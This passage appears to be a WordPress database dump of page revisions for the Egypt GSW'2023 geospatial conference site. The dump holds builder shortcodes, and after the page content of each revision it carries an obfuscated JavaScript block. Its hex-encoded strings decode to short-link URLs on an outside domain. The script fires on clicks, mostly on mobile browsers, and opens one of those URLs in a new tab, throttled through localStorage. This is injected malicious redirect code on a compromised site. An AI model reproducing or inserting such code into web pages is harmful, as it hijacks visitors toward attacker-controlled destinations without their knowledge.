border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row awb_type=\"image\" awb_stretch=\"1\" awb_image_background_position=\"0% 50%\" awb_image=\"2275\"][vc_column css=\".vc_custom_1668008599218{margin-bottom: 50px !important;border-bottom-width: 50px !important;padding-bottom: 50px !important;}\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668007819032{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668007827903{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:43:22','2022-11-09 15:43:22','',3066,'https://gsw2023.com/?p=3145',0,'revision','',0),
(3146,1,'2022-11-09 15:44:53','2022-11-09 15:44:53','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row awb_type=\"image\" awb_stretch=\"1\" awb_image_background_position=\"0% 50%\" awb_image=\"2275\"][vc_column css=\".vc_custom_1668008599218{margin-bottom: 50px !important;border-bottom-width: 50px !important;padding-bottom: 50px !important;}\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1668008682598{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1668008690957{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 